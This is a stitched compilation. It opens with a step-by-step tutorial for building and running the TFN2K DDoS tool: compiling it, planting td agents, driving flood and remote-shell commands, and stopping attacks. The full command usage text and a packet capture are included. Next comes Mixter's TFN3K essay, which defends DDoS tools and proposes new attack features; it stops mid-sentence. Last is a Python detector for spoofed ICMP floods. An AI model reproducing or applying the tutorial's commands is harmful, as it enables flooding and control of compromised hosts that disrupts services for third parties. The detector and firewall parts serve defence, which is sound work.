TFN2K in Practice

1. TFN2K's attack architecture

TFN2K, written by the German hacker Mixter, should count as the representative work among DDoS attack tools; what it can do is jaw-dropping. (My awe for it flows like a mighty river, without end.) Let's look at its architecture.

Master: runs the tfn client, which remotely controls the agents, designates the attack target and changes the attack method. (The chief culprit.)

Agent: a victim machine on which the td process has been planted and runs; it takes orders from tfn and actually carries out the attack. Note that an attacker usually controls many agents to complete an attack, and their systems are mostly Unix, Linux and the like. (The poor victims.)

Target: the host or network being attacked. Past DDoS victims include Yahoo, Amazon, CNN and eBay. (The biggest loser, as miserable as I am.)

2. TFN2K features

- The master sends commands to the agent hosts in TCP, UDP or ICMP packets, or randomly uses one of the three (random is the default). Attack methods include TCP/SYN, UDP, ICMP/PING, mixed flood and TARGA3.
- Communication between master and agent is one-way: the master only sends commands to the agents, with randomized header fields and even forged source addresses, and the agents never send anything back to the master.
- All commands are encrypted with the CAST-256 algorithm; the key is the password entered when the program is compiled, and this password is the sole authentication credential.
- Through the td process, the master can execute shell commands remotely.
- The name of the td process can be changed at compile time, which makes it easier to hide.
- tfn can be compiled and run on Win32 and Linux. Forging the source IP address and the like are basic functions, and compared with the old version of TFN its packet output is higher: in my own test, two agents brought my Red Hat Linux 9.0 system down in less than 5 minutes.

3. TFN2K hands-on test

Test environment

Software: Red Hat Linux 9.0

Hardware (the IP addresses are not preserved in this copy of the document):
- master: PIV 2.4 / 256*2 / rtl8139
- ag1: PIV 2.4 / 256* / rtl8139
- ag2: PIV 2.6 / 512*2 / 3c905
- aim: PIV 2.66c / 512*2 / 3c905
- switch: D-Link DES 1024R

Steps

1. Download tfn2k.tgz.

2. Extract it:

    tar zxvf tfn2k.tgz

3. Modify the files.

A. src/Makefile: on a Linux system nothing needs changing; on a Win32 system, comment out these lines:

    # Linux / *BSD* / Others
    CC = gcc
    CFLAGS = -Wall -O3
    CLIBS =

and uncomment these:

    # Win32 (cygwin)
    #CC = gcc
    #CFLAGS = -Wall -DWINDOZE -O2
    #CLIBS =

Since my test system is Red Hat Linux 9.0, I changed nothing.

B. src/config.h: the defaults are usable; if you are interested you can adjust it following its comments.

C. src/ip.h: this needs a change, otherwise compilation fails with a duplicate definition:

    /*
    struct in_addr
    {
      unsigned long int s_addr;
    };
    */

Note that I put it between /* and */, i.e. commented it out :)

D. Change the compiler: tfn2k supports egcs-1.1.2-30, while Red Hat Linux 9.0 ships gcc-3.2.2-5, so unless gcc is replaced tfn2k will not compile. Be warned that after the change, software that depends on gcc 3.2.2 may no longer build, so proceed with care. The method is simple: find a Red Hat Linux 6.2 installation disc and copy egcs-1.1.2-30.rpm and cpp-1.1.2-30.rpm to /:

    cd /mnt/cdrom/Redhat/RPMS
    cp egcs-1.1.2-30* cpp-1.1.2-30* /

Install cpp:

    rpm -Uvh --nodeps --oldpackage cpp-1.1.2-30.i386.rpm

Install egcs:

    rpm -Uvh egcs-1.1.2-30.i386.rpm

(If it reports an error, just skip past it with --nodeps, --oldpackage, --ignoreos and the like.)

4. Compile tfn2k:

    cd tfn2k/src
    make

First a disclaimer pops up, which you must accept; then you are prompted for an 8-32 character password. As mentioned above, this is the sole authentication credential and is built into the td process, so remember it well. When the build finishes it produces td and tfn; this is the famous tfn2k. td is the daemon that gets installed on the agents, and tfn is the controller.

5. Install td. Upload td to my two agents, ag1 and ag2. Since this is only a test, I used a legitimate root account to upload and run the td process. If you really had to find and install an agent you would have to work a lot harder, because no administrator is going to say "come on baby, I'll give you root, come install td and use me as an agent".

    [root@test /]# ftp <ag1>
    Connected to <ag1>.
    530 Please login with USER and PASS.
    530 Please login with USER and PASS.
    Name (<ag1>:root): wjpfjy
    331 Please specify the password.
    Password:
    230 Login successful. Have fun.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> put td
    local: td remote: td
    227 Entering Passive Mode (192,168,0,3,198,225)
    553 Could not create file.
    ftp> by
    221 Goodbye.

(put td uploads td; by quits ftp.) Then ssh to ag1 to run td; note that I use the root account, so that there are enough privileges to run it:

    [root@test /]# ssh <ag1>
    root@<ag1>'s password:
    Last login: Tue Feb 24 06:51:13 2004
    [root@ag1 /]# find / -name td -print
    [root@ag1 wjpfjy]# chmod a+x td
    [root@ag1 wjpfjy]# ./td

find locates the td file just uploaded, chmod makes it executable, and ./td runs it. Now you have an agent that will do whatever you tell it :( Install and run the TFN2K td process on ag2 the same way.

6. The attack begins (painful memories replaying). Back on master, get ready for the drill.

    [root@master root]# touch host.txt
    [root@master root]# echo <ag1> >> host.txt
    [root@master root]# echo <ag2> >> host.txt

host.txt is the agent list (if you are bored enough you may end up with many zombie agents, and you will forget them if they are not written down); the two echo lines add ag1 and ag2, where td has been run, to it. First test the link:

    [root@master root]# ./tfn -f host.txt -c 10 -i mkdir wjpfjy
    Protocol      : random
    Source IP     : random
    Client input  : list
    Command       : execute remote command
    Password verification:
    Sending out packets: .

This communicates with the agents in host.txt and has them execute the command mkdir wjpfjy, i.e. create a directory. At "Password verification:" you are prompted for the password entered at compile time; if it is wrong you cannot communicate with the td processes. Go to ag1 and ag2 and check whether a directory named wjpfjy was created; normally it is in the same directory as td, and if unsure you can look for it with find / -name wjpfjy -print.

    [root@master root]# ./tfn -f host.txt -c 6 -i <aim>

This starts the ICMP/PING flood against aim. (Poor P4 of mine: in under 5 minutes it was as slow as a 386.) Still, before it was game over it struggled to record the attack traffic, so it earned the N thousand yuan it cost. Here is the tcpdump capture (the source and destination addresses on the summary lines are read from the hex dump):

    [root@aim root]# tcpdump -r pack.atta -c 4 -xX
    08:03:36.524907 23.43.171.0 > 192.168.0.2: icmp: echo request [ttl 0]
    0x0000   4500 005c 659d 0000 0001 d22e 172b ab00        E..\e........+..
    0x0010   c0a8 0002 0800 f7ff 0000 0000 0000 0000        ................
    0x0020   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0030   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0040   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0050   0000                                           ..
    08:03:36.524933 192.168.0.2 > 23.43.171.0: icmp: echo reply
    0x0000   4500 005c a5d5 0000 4001 51f6 c0a8 0002        E..\....@.Q.....
    0x0010   172b ab00 0000 ffff 0000 0000 0000 0000        .+..............
    0x0020   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0030   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0040   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0050   0000                                           ..
    08:03:36.524944 36.235.130.0 > 192.168.0.2: icmp: echo request [ttl 0]
    0x0000   4500 005c 659d 0000 0001 ed6e 24eb 8200        E..\e......n$...
    0x0010   c0a8 0002 0800 f7ff 0000 0000 0000 0000        ................
    0x0020   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0030   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0040   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0050   0000                                           ..
    08:03:36.524984 192.168.0.2 > 36.235.130.0: icmp: echo reply
    0x0000   4500 005c 551c 0000 4001 bdef c0a8 0002        E..\U...@.......
    0x0010   24eb 8200 0000 ffff 0000 0000 0000 0000        $...............
    0x0020   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0030   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0040   0000 0000 0000 0000 0000 0000 0000 0000        ................

    [root@master root]# ./tfn -f host.txt -c 0
    Protocol      : random
    Source IP     : random
    Client input  : list
    Command       : stop flooding
    Password verification:
    Sending out packets: .

This stops the attack. Of course there are other attack methods; just use -c X to change the method:

    [root@master root]# ./tfn
    usage: ./tfn
    -P protocol        Protocol for server communication. Can be ICMP, UDP or TCP.
                       Uses a random protocol as default
    -D n               Send out n bogus requests for each real one to decoy targets
    -S host/ip         Specify your source IP. Randomly spoofed by default, you need
                       to use your real IP if you are behind spoof-filtering routers
    -f hostlist        Filename containing a list of hosts with TFN servers to contact
    -h hostname        To contact only a single host running a TFN server
    -i target string   Contains options/targets separated by , see below
    -p port            A TCP destination port can be specified for SYN floods
                       0 - Halt all current floods on server(s) immediately
                       1 - Change IP antispoof-level (evade rfc2267 filtering)
                           usage: -i 0 (fully spoofed) to -i 3 (/24 host bytes spoofed)
                       2 - Change Packet size, usage: -i
                       3 - Bind root shell to a port, usage: -i
                       4 - UDP flood, usage: -i victimvictim2victim3.
                       5 - TCP/SYN flood, usage: -i victim. -p destination port
                       6 - ICMP/PING flood, usage: -i victim.
                       7 - ICMP/SMURF flood, usage: -i victimbroadcastbroadcast2.
                       8 - MIX flood (UDP/TCP/ICMP interchanged), usage: -i victim.
                       9 - TARGA3 flood (IP stack penetration), usage: -i victim.
                      10 - Blindly execute remote shell command, usage -i command

(The separator character and the argument placeholders of this usage text are missing from this copy.)

4. Defending against TFN2K

Like every article about DDoS on the net says, DDoS is very hard to defend against. I tried to protect my host by filtering all ICMP packets at the firewall, but all that achieved was that my host crashed a little later. Don't look to me to defend against DDoS; if I could, I wouldn't be going without sleep :( It's the same old story: what we can do is make sure our own hosts do not become agents for someone else's attack, and strictly restrict the packets leaving our intranet, so that we at least do not harm others. Only if everyone does this will our network environment become a bit safer, and at least I will be able to sleep soundly for a few days. Here is part of my firewall, mainly aimed at ICMP/PING, though it does not help much :( (the addresses stripped from this copy are shown as <addr>)

    /sbin/iptables -P INPUT DROP
    /sbin/iptables -A INPUT -i lo -p all -j ACCEPT
    /sbin/iptables -A INPUT -i eth1 -p icmp -j ACCEPT
    /sbin/iptables -A INPUT -p icmp --icmp-type 8 -j DROP
    /sbin/iptables -A INPUT -s <addr> -i lo -j ACCEPT
    /sbin/iptables -A INPUT -s <addr> -i eth0 -j DROP
    /sbin/iptables -A INPUT -s $LAN_NET/24 -i eth0 -j DROP
    /sbin/iptables -A INPUT -s <addr>/12 -i eth0 -j DROP
    /sbin/iptables -A INPUT -s <addr>/8 -i eth0 -j DROP
    /sbin/iptables -A INPUT -i eth0 -m limit --limit 1/sec --limit-burst 5 -j ACCEPT
    /sbin/iptables -A INPUT -i eth0 -p udp -m state --state NEW -j REJECT
    /sbin/iptables -A INPUT -p tcp --dport 22 -j ACCEPT
    /sbin/iptables -A INPUT -p tcp --dport 80 -j ACCEPT
    /sbin/iptables -A INPUT -p tcp -i eth1 --dport 53 -j ACCEPT
    /sbin/iptables -A INPUT -p udp -i eth1 --dport 53 -j ACCEPT
    /sbin/iptables -A INPUT -p tcp -i eth0 -m state --state ESTABLISHED,RELATED -m tcp --dport 1024: -j ACCEPT
    /sbin/iptables -A INPUT -p udp -i eth0 -m state --state ESTABLISHED,RELATED -m udp --dport 1024: -j ACCEPT
    /sbin/iptables -A INPUT -p icmp --icmp-type echo-request -j LOG --log-level 2
    /sbin/iptables -A INPUT -i eth0 -p icmp --icmp-type echo-request -j DROP
    /sbin/iptables -A INPUT -p tcp -m multiport --destination-port 135,137,138,139 -j LOG
    /sbin/iptables -A INPUT -p udp -m multiport --destination-port 135,137,138,139 -j LOG
    /sbin/iptables -A INPUT -i eth0 -p tcp --dport 2000 -j ACCEPT
    /sbin/iptables -A INPUT -i eth0 -p tcp --dport 2001 -j ACCEPT
    /sbin/iptables -A INPUT -p tcp -i eth1 -m state --state ESTABLISHED,RELATED -m tcp --dport 1024: -j ACCEPT


TFN3K

Tribe Flood Network 3000: A theoretical review of what exactly Distributed DOS tools are, how they can be used, what more dangerous features can be implemented in the future, and starting points on establishing Network Intrusion Detection Rules for DDOS.

Many technically uninformed people consider DDOS as a weapon that should not be publicly evolved and distributed. This is the only further thing I'll be releasing to explain DDOS tools, comprehensible for EVERYONE, and future features that may be implemented in DDOS: a brief theoretical description. BTW: People with technical knowledge may skip over most of the stuff in I. and II.

I. What is distributed DOS, what can it be used for, how does it operate?
II. What are DDOS features, what are future DDOS features, how is DDOS evolving?
III. DDOS, an exploit or not? Should it be published? What is the main problem?
IV. How can DDOS traffic be detected by Network Intrusion Detection (NIDS)?

I. What is distributed DOS?

Distributed DOS, like any distributed concept, will make it easy to coordinate a procedure that is launched from many computers. In this case it is Denial Of Service in the form of packet flooding, to overload network links.

DDOS IS NOT A HACKING TOOL CATEGORY.
Distributed DOS tools are PENETRATION tools. They do not exploit security vulnerabilities, but they can demonstrate what amount of traffic a host can or cannot handle. Distributed DOS has been used a long time by professional security consultants for penetration testing. Before there were DDOS attack tools, there have been commercial, non-open-source programs out that could launch distributed packet floods. Those were used in the information security consulting business, to perform a security service called Capacity Management. The purpose of Capacity Management is to determine how much traffic a network can handle, to see if the target's bandwidth has to be improved, or if it can handle enough traffic while providing service reliably.

What can it be used for?

It can overload, or flood if you want, network links. It sends meaningless packets, the overall amount of data being more than the network can process. The impact is that the targets can not be reached over a network. That is all.

How does it operate?

The basic concept is that you install a huge amount of DOS servers on different hosts. They will await commands from a central client. A central client can then message all the servers, and instruct them to send as much traffic as they can to one target. The tool distributes the work of flooding a target amongst all available DOS servers, therefore it is called a distributed concept. Before these tools were available, an attacker (or penetration tester) would have to telnet into all the hosts that he wanted to use, log in as a user, and manually launch a command to flood a target on each of the hosts that should flood, for example using the UNIX standard tool ping: ping -f target

II. What are DDOS features?

The actual attack tools don't do simple flooding, but variations of it which involve using actual weaknesses in a protocol to a) make an attack more powerful b) make an attack harder to track back. First, current DDOS tools spoof source addresses.
They are sending raw IP packets, and due to the nature of the internet protocol the source addresses can be fake ones, and single (not connection oriented) packets will still reach their destination. This is basically what makes backtracking of the attacks so hard. DDOS is also exploiting protocol weaknesses; it can for example open up half-open TCP connections by SYN flooding. This is a very old and well known protocol vulnerability, and feasible countermeasures are present. To make attacks more powerful, DDOS can generally use any protocol vulnerability that can be exploited by sending single, not connection oriented packet traffic to a host.

What are future DDOS features?

Things that can still be implemented, but have not in publicized tools, are protocol vulnerabilities as mentioned above. One of those is the stream attack (discovered by Tim Yardley, stream.c and spank.c demonstrate the vulnerability and are public). Stream attack sends TCP packets with either ACK or both SYN and ACK flags set. Because they are not part of a connection, they will confuse a target machine and take some time to be processed by the operating system. If this attack is used in a distributed way, the attacker can overload machines with fewer hosts. From what I've heard, distributed stream attack IS already implemented in private DDOS tools. It is very trivial to implement this feature. Possibility 2 that is not implemented yet are multicast addresses. Multicast addresses are routed (forwarded) specially by routers; they can multiply one packet into several ones. The concept would be to send out packets with a multicast (224.x.x.x) source. A target could send an error message back to multicast destinations, and multiply the bandwidth. This concept has also been mentioned by Tim Yardley.
Another concept could be to purposefully send special strings in the flood traffic, strings that Intrusion Detection Systems (IDS) could falsely interpret as break-in attempts; the impact would be false alarms, and affected IDS could get overloaded or crash.

How is DDOS evolving?

As I mentioned, the first tools that did distributed denial of service were commercial penetration tools. The origin of using general DOS is certainly IRC (Internet Relay Chat), where kiddies can take over control of channels if they temporarily take out computer systems with DOS. The first packet flooding DOS that involved multiple servers flooding was smurf. Smurfing relied on mis-configured networks replying back to a broadcast address; sending one packet would result in hundreds bouncing back. Then, most of those networks were fixed, and attackers compromised a lot of hosts, preferably hosts with high bandwidth, and started flooding manually from them. Because this took a lot of time, attackers wrote servers which they installed on the hosts they had compromised. They no longer needed to log in, but only message those servers. The DDOS attack tools I know of are, in chronological release order: fapi (private, by ?), blitznet (public, by phreeon), trinoo (private, by phifli), TFN (public, by me), stacheldraht (private, by randomizer), shaft (private, by ?), TFN2K (public, by me), Trank (TRinoo + spANK.c?, private). The recent development has also continued in other ways: since people were monitoring traffic for very DDOS-program-specific traffic (like known character strings, known passwords, default ports), there have been many small variations made to the code of the above tools, by attackers, to prevent being detected.

III. DDOS, an exploit or not?

No. DDOS itself is not an exploit. It just makes an existing concept easier. Take the RC5 challenge and distributed password crackers. They are not exploits. But they are exposing a weakness, that many passwords can be brute forced faster than people think.
DDOS shows that many networks are not as strong as they seem to be and can be overloaded faster than people used to think. Additionally, there are actual exploits implemented in DDOS tools, that exploit security holes in network protocols currently used on the Internet. These security holes must not necessarily be exploited to make DDOS possible, but they do make the impact of DDOS attacks more powerful. Such exploits are the possibility of arbitrarily spoofing IP addresses, SYN flooding, IP stack attacks with bad fragmentation, header offsets and other magic packets, the stream vulnerability, and missing authentication and security of traffic known as connection-less or stateless.

Should it be published?

That is for you to decide. It is your personal opinion. But people will continue to publish vulnerabilities. Hundreds of talented security analysts are professionally researching vulnerabilities in software, and posting exploit programs, which can often be used to instantly compromise a system running the vulnerable software at root level. The past has shown that, since security vulnerabilities were a problem on the internet, people have been ignoring advisories containing only the information THAT something was vulnerable to an attack, disregarding them as being completely theoretic. Only when people wrote up and posted ready-to-(ab)use vulnerability exploits did the severity of vulnerabilities become clear, and people would make an effort to counter those vulnerabilities.

What is the main problem?

The main problem, that made attacks against sites as big as possible, is the bad overall security on the internet. With ONLY a DDOS tool in his hands, Joe Attacker cannot do anything. But security vulnerabilities are omni-present on the majority of hosts on the net. An awful lot of these hosts are not caring about their security,
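The tcpdump capture in the first document above shows what TFN2K's ICMP flood looks like on the wire: echo requests with TTL 0, ICMP id and sequence both 0, and a different forged source on every packet, which is the spoofing behaviour section II describes. The Python below is an added example, not code from either document: it decodes a packet from that hex dump, flags the fields a normal ping would never produce, and counts one-off source addresses per destination; the 100-source and 0.9 one-off-ratio thresholds are my assumptions.

```python
import ipaddress
from collections import Counter

# First echo request from the tcpdump -xX capture above: IPv4 header plus the
# 8-byte ICMP header (the all-zero payload that followed is not needed here).
CAPTURED_ECHO_REQUEST = (
    "4500 005c 659d 0000 0001 d22e 172b ab00 "
    "c0a8 0002 0800 f7ff 0000 0000 0000 0000"
)

def parse_ipv4_icmp(hex_dump):
    """Decode an IPv4 packet carrying ICMP from a space-separated hex dump."""
    raw = bytes.fromhex(hex_dump.replace(" ", ""))
    ihl = (raw[0] & 0x0F) * 4
    if raw[0] >> 4 != 4 or len(raw) < ihl + 8:
        raise ValueError("not a complete IPv4 packet with an ICMP header")
    if raw[9] != 1:
        raise ValueError("IP protocol %d is not ICMP" % raw[9])
    icmp = raw[ihl:ihl + 8]
    return {
        "ttl": raw[8],
        "src": str(ipaddress.IPv4Address(raw[12:16])),
        "dst": str(ipaddress.IPv4Address(raw[16:20])),
        "icmp_type": icmp[0],
        "icmp_id": int.from_bytes(icmp[4:6], "big"),
        "icmp_seq": int.from_bytes(icmp[6:8], "big"),
    }

def crafted_indicators(pkt):
    """Per-packet oddities that a normal ping implementation does not produce."""
    flags = []
    if pkt["ttl"] == 0:
        flags.append("ttl0")         # raw-socket sender left the TTL field unset
    if pkt["icmp_type"] == 8 and pkt["icmp_id"] == pkt["icmp_seq"] == 0:
        flags.append("zero-id-seq")  # ping(8) uses its pid as id and counts seq
    return flags

def spoof_fanout(pkts, min_sources=100, one_off_ratio=0.9):
    """Destinations flooded from many one-off sources (thresholds are assumptions)."""
    per_dst = {}
    for p in pkts:
        if p["icmp_type"] == 8:
            per_dst.setdefault(p["dst"], Counter())[p["src"]] += 1
    suspicious = {}
    for dst, srcs in per_dst.items():
        # random spoofing: many distinct sources, nearly all seen exactly once
        one_off = sum(1 for n in srcs.values() if n == 1) / len(srcs)
        if len(srcs) >= min_sources and one_off >= one_off_ratio:
            suspicious[dst] = len(srcs)
    return suspicious
```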
